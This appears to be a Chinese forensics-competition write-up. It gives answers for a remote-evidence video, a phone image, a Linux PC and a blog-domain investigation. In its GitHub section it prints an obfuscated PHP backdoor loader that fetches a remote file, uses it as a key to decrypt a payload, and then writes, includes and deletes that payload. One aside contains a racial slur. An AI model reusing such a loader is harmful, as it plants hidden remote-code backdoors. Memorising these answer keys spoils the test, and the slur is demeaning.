檢材一

1.請(qǐng)分析檢材一，該取證錄像文件的 SHA256 值為

結(jié)果為2753DA22FE23CADAADC14FE4C1D5096A153360D9F91097EA376846431F5C1567

2.請(qǐng)分析檢材一，遠(yuǎn)程取證所使用的 OBS 工具版本號(hào)為

結(jié)果為29.1.3

3.請(qǐng)分析檢材一，該檢材所使用的遠(yuǎn)程取證的工具名稱為

結(jié)果為網(wǎng)鏡

4.請(qǐng)分析檢材一，在該檢材中，遠(yuǎn)程取證過(guò)程中校驗(yàn)的北京時(shí)間為

結(jié)果為2025-04-09 13:36:18

5.請(qǐng)分析檢材一，遠(yuǎn)程取證的網(wǎng)站 IP 地址為

結(jié)果為172.16.10.200

6.請(qǐng)分析檢材一，在該檢材中，遠(yuǎn)程取證的網(wǎng)站密碼為

結(jié)果為admin123

以下題目，既然是固定頁(yè)面數(shù)據(jù)，如果不爬接口、不爬網(wǎng)頁(yè)，最不濟(jì)最不濟(jì)也要把當(dāng)前網(wǎng)頁(yè)保存下來(lái)。弄成截圖是考工具還是邏輯？既鍛煉不了能力，也沒有實(shí)戰(zhàn)意義。

7.請(qǐng)分析檢材一，在已固定的“訂單列表”中發(fā)現(xiàn)有一頁(yè)缺失。請(qǐng)找出缺失頁(yè)面的具體頁(yè)碼為
8.請(qǐng)分析檢材一，補(bǔ)充“訂單列表”中缺失頁(yè)面的數(shù)據(jù)后，統(tǒng)計(jì)訂單的總數(shù)為
9.請(qǐng)分析檢材一，補(bǔ)充“訂單列表”中缺失頁(yè)面的數(shù)據(jù)后，統(tǒng)計(jì)已完成訂單中“老李監(jiān)控批發(fā)” 的訂單數(shù)為
10.請(qǐng)分析檢材一，補(bǔ)充“訂單列表”中缺失頁(yè)面的數(shù)據(jù)后，統(tǒng)計(jì)已完成訂單中“老李監(jiān)控批發(fā)” 的ZK-101產(chǎn)品的訂單數(shù)為
11.請(qǐng)分析檢材一，補(bǔ)充“訂單列表”中缺失頁(yè)面的數(shù)據(jù)后，統(tǒng)計(jì)已完成訂單中“老李監(jiān)控批發(fā)” 產(chǎn)品在上海區(qū)域的訂單數(shù)為
12.請(qǐng)分析檢材一，補(bǔ)充“訂單列表”中缺失頁(yè)面的數(shù)據(jù)后，統(tǒng)計(jì)已完成訂單中“老李監(jiān)控批發(fā)”的銷售情況，并計(jì)算“趙磊（13967346658）”優(yōu)惠后的總金額為（例如，優(yōu)惠率為10%時(shí)按原單價(jià)的90%計(jì)算）
13.請(qǐng)分析檢材一，補(bǔ)充“代理列表”中缺失頁(yè)面的數(shù)據(jù)后，統(tǒng)計(jì)代理人的最大層級(jí)數(shù)為（其中頂級(jí)代理的用戶定義為第1層）
14.請(qǐng)分析檢材一，補(bǔ)充“代理列表”中缺失頁(yè)面的數(shù)據(jù)后，統(tǒng)計(jì)每位代理的直接下游人數(shù)， 并確定直接下游人數(shù)排名第一的代理人為
15.請(qǐng)分析檢材一，補(bǔ)充“代理列表”中缺失頁(yè)面的數(shù)據(jù)后，根據(jù)地址信息統(tǒng)計(jì)各區(qū)域的代理人數(shù)，并確定上海區(qū)域的代理人數(shù)為

給幾種方式

1. 對(duì)圖片ocr，由于網(wǎng)頁(yè)布局都差不多，可以用正則匹配，把表單數(shù)據(jù)都拿到然后轉(zhuǎn)csv等
2. 找圖片轉(zhuǎn)表格工具
3. 利用大模型初步得到結(jié)果，然后解析成csv
4. 找?guī)讉€(gè)牛馬或者黑奴，手工挪到表格里

檢材二

1.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，并回答該手機(jī)的device_name是？

結(jié)果為Redmi 6 Pro

2.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人pc開機(jī)密碼是什么？

不在小米筆記里

結(jié)果為1qaz2wsx

3.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人接頭暗號(hào)是什么？

注意到有一張圖片

找到該圖片

結(jié)果為愛能不能夠永遠(yuǎn)單純沒有悲哀

4.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人存放的秘鑰環(huán)是多少？

小米筆記里，但不在筆記表中，在data表中

結(jié)果為1qaz2wsx3edc

5.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人一生中最重要的日子是什么時(shí)候？

看一下應(yīng)用市場(chǎng)安裝記錄，有個(gè)倒數(shù)日

找到數(shù)據(jù)目錄，是一個(gè)realm數(shù)據(jù)庫(kù)

Realm Studio打不開，硬看，可以這樣推測(cè)出對(duì)應(yīng)關(guān)系

另外這個(gè)目錄里的圖片里面有提到博客地址chen.foren6

結(jié)果為2026-02-26

6.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人微信生成的聊天記錄數(shù)據(jù)庫(kù)文件名稱是什么？

結(jié)果為EnMicroMsg.db

7.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人微信賬號(hào)對(duì)應(yīng)的 UIN 為多少？

結(jié)果為1864810197

8.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人微信聊天記錄數(shù)據(jù)庫(kù)的加密秘鑰是什么？

結(jié)果為31ad809

9.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人“欠條.rar”的解壓密碼是多少？

解密數(shù)據(jù)庫(kù)

可以看到解壓密碼是對(duì)方手機(jī)號(hào)

手機(jī)號(hào)通過(guò)圖片發(fā)送

能看出有個(gè)二維碼

用windows的照片查看更清晰，微信可以掃出來(lái)+1 3170010703，其中+1是區(qū)號(hào)

找到壓縮包測(cè)試密碼

結(jié)果為3170010703

10.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人“欠條.rar”解壓后，其中VeraCrypt容器的MD5值是多少？

結(jié)果為83DA62AABC88CB1B23E9469142B67B80

11.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人提供的“欠條.rar”解壓后，其中"1.png"圖上顯示的VeraCrypt容器密碼是多少？

可以用ImageJ調(diào)整調(diào)整

結(jié)果為#!@KE2sax@!da0h5hghg34&@

12.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人李某全名是什么？

結(jié)果為李安弘

13.請(qǐng)分析檢材二，請(qǐng)分析"手機(jī)"檢材，并回答，嫌疑人欠款金額是多少？

結(jié)果為80000

檢材三

1.請(qǐng)分析檢材三，請(qǐng)分析"電腦"檢材，并回答，該電腦最后一次開機(jī)時(shí)間是？

/var/log/wtmp，開機(jī)和關(guān)機(jī)相對(duì)應(yīng)，所以中間那一次是真重啟，第一次是開機(jī)

結(jié)果為2025-04-15 11:49:47

2.請(qǐng)分析檢材三，請(qǐng)分析"電腦"檢材，并回答，嫌疑人的備用機(jī)號(hào)碼是多少？

麒麟便簽數(shù)據(jù)庫(kù)\home\adm1n\.config\kylin-note\kyNotes.db，發(fā)現(xiàn)有一個(gè)筆記的html數(shù)據(jù)特別大

有一張圖片在里面

結(jié)果為18877332134

3.請(qǐng)分析檢材三，請(qǐng)分析"電腦"檢材，并回答，域名dgy02.com曾保存過(guò)一個(gè)密碼，該密碼是多少？

仿真，有密碼1qaz2wsx就不饒，需要密鑰環(huán)1qaz2wsx3edc，瀏覽器直接解密

結(jié)果為tcgg123456

4.請(qǐng)分析檢材三，請(qǐng)分析"電腦"檢材，并回答，其電腦安裝的微信版本是多少？

結(jié)果為4.0.1.12

5.請(qǐng)分析檢材三，請(qǐng)分析"電腦"檢材，并回答，該系統(tǒng)有哪些遠(yuǎn)程控制軟件

結(jié)果為向日葵、todesk

6.請(qǐng)分析檢材三，請(qǐng)分析"電腦"檢材，并回答，電腦2025年4月10日11點(diǎn)4分29秒曾被向日葵遠(yuǎn)程控制，其記錄的日志文件名為

/var/log/sunlogin

結(jié)果為sunlogin_service.log.2

7.請(qǐng)分析檢材三，請(qǐng)分析"電腦"檢材，并回答，電腦2025年4月10日11點(diǎn)4分29秒曾被向日葵遠(yuǎn)程控制，日志內(nèi)記錄對(duì)方公網(wǎng)IP地址和端口為

結(jié)果為116.192.161.222:2577

8.請(qǐng)分析檢材三，請(qǐng)分析"電腦"檢材，并回答，某文件的MD5值為“ 2bdfcdbd6c63efc094ac154a28968b7d”，該文件名為

結(jié)果為important.docx

9.請(qǐng)分析檢材三，請(qǐng)分析"電腦"檢材，據(jù)調(diào)查，上述文件存放了錢包助記詞，第一個(gè)單詞是什么？

jpg

結(jié)果為solution

10.請(qǐng)分析檢材三（“我的測(cè)試機(jī)”），最近曾訪問過(guò)的音頻文件，該音頻文件的文件名是什么

結(jié)果為自傳小說(shuō).mp3

11.請(qǐng)分析檢材三（“我的測(cè)試機(jī)”），最近曾使用過(guò)USB設(shè)備，該設(shè)備的名稱為

結(jié)果為256GB thinkplus

12.請(qǐng)分析檢材三（“我的測(cè)試機(jī)”）中的音頻內(nèi)容，并回答，嫌疑人現(xiàn)任妻子畢業(yè)的大學(xué)是？

結(jié)果為上海大學(xué)

13.請(qǐng)分析檢材三（“我的測(cè)試機(jī)”）中的音頻內(nèi)容，并回答，嫌疑人是通過(guò)一個(gè)朋友認(rèn)識(shí)的陳老板，該朋友姓氏拼音是？

結(jié)果為wang

14.請(qǐng)分析檢材三（“我的測(cè)試機(jī)”）中的音頻內(nèi)容，并回答，嫌疑人所說(shuō)的香格里拉大酒店實(shí)則是？

15.請(qǐng)分析檢材三（“我的測(cè)試機(jī)”）中的音頻內(nèi)容，并回答，嫌疑人銀行密碼是多少？

聽說(shuō)是藏頭，挺逆天的，我才不聽

互聯(lián)網(wǎng)固證

1.請(qǐng)分析檢材二，找到李某上游人員陳某博客宣傳所用域名為

設(shè)置dnshttps://docs.hnsdns.com/dns-resolver/windows/后訪問chen.foren6會(huì)跳轉(zhuǎn)

結(jié)果為blog.chen.foren6

2.請(qǐng)分析陳某宣傳所用域名，該域名的頂級(jí)域名在以下那個(gè)區(qū)塊鏈注冊(cè)

在namebase中搜索，注意到varo

繼續(xù)搜索varo

結(jié)果為hns

3.請(qǐng)分析陳某宣傳所用域名的頂級(jí)域名的域名解析服務(wù)器（DNS）共有幾個(gè)

結(jié)果為2

4.請(qǐng)分析陳某宣傳所用域名的頂級(jí)域名的NS1服務(wù)器ip為

結(jié)果為45.79.133.98

5.請(qǐng)分析陳某宣傳所用域名，該域名DNS記錄指向郵件服務(wù)器域名為

nslookup查看

結(jié)果為mail.163.com

6.請(qǐng)分析陳某宣傳所用域名，該域名的txt記錄中chen的值為

結(jié)果為fengbaoliejiu

7.請(qǐng)分析陳某宣傳所用域名，該域名DNS記錄沒有以下那個(gè)域名

A、admin.chen.foren6 B、caidan.chen.foren6 C、fic.chen.foren6 D、hl.chen.foren6

結(jié)果為D

8.請(qǐng)分析陳某宣傳所用域名，該博客域名最終DNS解析指向的github倉(cāng)庫(kù)名為

結(jié)果為chewhaoN.github.io

9.請(qǐng)分析陳某github賬號(hào)，陳某對(duì)jkroepke/2Moons項(xiàng)目增改了幾個(gè)文件

下載兩個(gè)2Moons，bc進(jìn)行比對(duì)

比對(duì)時(shí)需要進(jìn)行設(shè)置，因?yàn)檫@些文件的換行不統(tǒng)一

結(jié)果為2

10.請(qǐng)分析陳某github賬號(hào)，陳某在修改2Moons過(guò)程中提到了什么鍋底

這是php中的差異內(nèi)容

$a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');$b=md5($a,true);$c=file_get_contents('../../../../encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);$j=sys_get_temp_dir();$k=$j.'/func_'.uniqid().'.php';file_put_contents($k,"<?php\n".$i);include $k;unlink($k);yijuhua();

結(jié)果為蜂蜜鍋底

11.請(qǐng)分析陳某github賬號(hào)，陳某在游戲2Moons中放置的后門連接碼的密碼為

文件下載下來(lái)，echo一下

結(jié)果為ficnb

12.請(qǐng)?jiān)L問陳某當(dāng)前博客，陳某課程的掃碼報(bào)名地址的域名為

結(jié)果為https://fic.forensix.cn

13.請(qǐng)分析陳某當(dāng)前博客，通過(guò)互聯(lián)網(wǎng)找到陳某的舊博客網(wǎng)站標(biāo)題為

點(diǎn)擊老博客會(huì)跳轉(zhuǎn)http://forensix2025.work.gd/，但是已經(jīng)無(wú)法訪問

webarchive找一下

結(jié)果為柳如煙大戰(zhàn)霸天虎

14.請(qǐng)分析陳某舊博客，陳某的姓名為

結(jié)果為陳浩北

15.請(qǐng)分析陳某舊博客，陳某的郵箱地址為

結(jié)果為mailme@chen.foren6

16.請(qǐng)分析陳某舊博客，陳某的11位手機(jī)號(hào)為

結(jié)果為13170010703

17.請(qǐng)分析陳某舊博客，陳某最愛的dota英雄為

A賞金獵人 B幻影刺客 C斧王 D邪影芳靈

結(jié)果為D